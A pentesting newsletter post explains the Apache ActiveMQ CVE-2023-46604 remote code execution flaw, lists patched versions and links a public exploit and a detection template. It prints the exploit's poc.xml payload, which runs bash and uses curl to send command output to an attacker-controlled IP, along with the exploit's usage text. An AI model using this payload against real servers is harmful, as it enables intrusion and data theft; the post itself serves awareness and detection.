Learn Pentesting like a Pro!

Share this post

Learn Pentesting like a Pro!
Learn Pentesting like a Pro!
New exploit for Apache ActiveMQ CVE-2023-46604
Copy link
Facebook
Email
Notes
More

New exploit for Apache ActiveMQ CVE-2023-46604

Update! Update! Update!

DH
Nov 22, 2023
1

Share this post

Learn Pentesting like a Pro!
Learn Pentesting like a Pro!
New exploit for Apache ActiveMQ CVE-2023-46604
Copy link
Facebook
Email
Notes
More
Share

Last week, it was published a new exploit to attack Apache ActiveMQ, one of the most used messaging brokers. As Wikipedia says,

Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service (JMS) client.

The impact is quite HUGE: Remote Code Execution with Apache privileges.

If your organization is not using those versions, you are in big trouble:

ActiveMQ Classic:

  • 6.0.0

  • 5.18.3

  • 5.17.6

  • 5.16.7 (last release from this branch)

  • 5.15.16 (last release from this branch)

ActiveMQ Artemis:

  • 2.31.2

There are already a bunch of public exploits. You can have a look here: https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell

Where the payload is triggered by poc.xml. You can see below that the problem is that there is not enough data filtering and the server executes whatever system commands you pass to the constructor of a bean id in the server:

<?xml version="1.0" encoding="UTF-8" ?>

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
  <constructor-arg>
    <list>
      <value>bash</value>
      <value>-c</value>
      <value>ls -lah | awk '{print $0";"}' | curl -X POST -d @-   http://10.10.14.59:8181/receive_data</value>
    </list>
  </constructor-arg>
</bean>
</beans>

The usage of this exploit is quite simple:

usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]

optional arguments:
  -h, --help            show this help message and exit
  -i IP, --ip IP        ActiveMQ Server IP or Hostname
  -p PORT, --port PORT  ActiveMQ Server Port, defaults to 61616
  -si SRVIP, --srvip SRVIP
                        Serve IP
  -sp SRVPORT, --srvport SRVPORT
                        Serve port, defaults to 8080

Where IP and port are the vulnerable ActiveMQ servers and SRVIP and SRVPORT is your public IP address hosting the payload (poc.xml).

Also if you are running nuclei in your org, there is already a new template to check this vulnerability:
https://github.com/projectdiscovery/nuclei-templates/blob/48f2cd1b3ecf5963be495947e2e594e599e39d1f/network/cves/2023/CVE-2023-46604.yaml

More info:

  • https://activemq.apache.org/news/cve-2023-46604

  • https://www.trendmicro.com/en_us/research/23/k/cve-2023-46604-exploited-by-kinsing.html

Thanks for reading Learn Pentesting like a Pro! Subscribe for free to receive new posts

1

Share this post

Learn Pentesting like a Pro!
Learn Pentesting like a Pro!
New exploit for Apache ActiveMQ CVE-2023-46604
Copy link
Facebook
Email
Notes
More
Share

Discussion about this post

No posts

Ready for more?

© 2024 pentesting.academy
Privacy ∙ Terms ∙ Collection notice
Start WritingGet the app
Substack is the home for great culture

Share

Copy link
Facebook
Email
Notes
More